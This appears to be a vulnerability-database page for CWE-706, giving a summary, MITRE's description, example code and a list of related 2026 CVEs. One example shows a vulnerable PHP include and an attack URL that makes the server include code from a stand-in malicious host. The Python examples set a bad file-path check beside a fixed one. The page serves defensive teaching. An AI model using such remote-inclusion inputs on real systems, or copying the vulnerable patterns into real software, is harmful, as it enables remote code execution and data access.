Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CWE-706 (使用不正确的解析名称或索引) — Vulnerability Class 67

67 vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引). AI Chinese analysis included.

CWE-706 represents a critical input validation weakness where a software system incorrectly resolves a name or reference, leading to access of resources outside its intended control sphere. This vulnerability typically arises when applications fail to properly sanitize or validate user-supplied identifiers, allowing attackers to manipulate references to point to unauthorized files, database entries, or network endpoints. Exploitation often involves path traversal or pointer manipulation, enabling unauthorized data access, privilege escalation, or system compromise by redirecting operations to sensitive areas. To mitigate this risk, developers must implement strict input validation, ensuring all references are checked against a whitelist of allowed values. Additionally, using canonicalization techniques to normalize paths before resolution and employing least-privilege principles for resource access can significantly reduce the attack surface, ensuring that resolved references remain within the expected and secure boundaries of the application’s operational environment.

MITRE CWE Description
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity Read Application Data, Modify Application Data
Examples (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os import sys def main(): filename = sys.argv[1] path = os.path.join(os.getcwd(), filename) try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Bad · Python
import os import sys def main(): filename = sys.argv[1] path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"): try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Good · Python
CVE ID Title CVSS Severity Published
CVE-2026-93375 Chrome 153.0.8010.52 之前沙箱逃逸漏洞 — Chrome - - 2026-09-17
CVE-2026-92951 vm2 before 3.11.7 Module Allowlist Bypass via Custom Resolver — vm2 9.9 Critical 2026-09-17
CVE-2026-91727 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-15
CVE-2026-87618 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87562 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87613 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87547 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-81383 Visual Studio Code Information Disclosure Vulnerability — Visual Studio Code 7.4 High 2026-09-08
CVE-2026-79254 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79273 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79103 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79070 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79049 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79264 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-78942 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-78985 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-67602 phpIPAM < 1.8.2 Authentication Bypass via REST API Object Cache — phpipam 9.1 Critical 2026-08-24
CVE-2026-65816 Azure Arc Elevation of Privilege Vulnerability — Azure Web Apps 10.0 Critical 2026-08-20
CVE-2026-13097 Ipa: privilege escalation via krbcanonicalname manipulation due to realm-unaware uniqueness enforcement in freeipa ldap datastore — Red Hat Enterprise Linux 10 8.7 High 2026-08-20
CVE-2026-76039 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-18
CVE-2026-29036 cJSON 1.7.19 Wrong-Key Modification via JSON Pointer Escape Decoding — cJSON 7.5 High 2026-08-11
CVE-2026-16120 nextlevelbuilder GoClaw exec_approval.go extractBin name resolution — GoClaw 6.3 Medium 2026-07-18
CVE-2026-62190 OpenClaw < 2026.6.9 Authorization Bypass via flock wrapper — OpenClaw 8.8 High 2026-07-13
CVE-2026-57054 Junos OS: MX Series: Web filtering doesn't block specifically formatted URLs — Junos OS 5.8 Medium 2026-07-09
CVE-2025-12506 Use of Incorrectly-Resolved Name or Reference in GitLab — GitLab 3.5 Low 2026-07-08
CVE-2026-13372 Devolutions Remote Desktop Manager 输入验证错误漏洞 — Remote Desktop Manager - - 2026-06-26
CVE-2026-54022 Open WebUI: Any authenticated user can read other users' private notes via Socket.IO — open-webui 5.3 Medium 2026-06-23
CVE-2026-54282 Starlette: Unvalidated request path concatenated into authority poisons request.url.hostname — starlette 3.7 Low 2026-06-22
CVE-2026-10696 Devolutions UniGetUI 输入验证错误漏洞 — UniGetUI - - 2026-06-17
CVE-2026-45306 pyLoad: Incomplete Fix for CVE-2026-33509 -storage_folder Bypass via Session Directory — pyload 6.5 Medium 2026-05-28

Vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引) represent 67 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.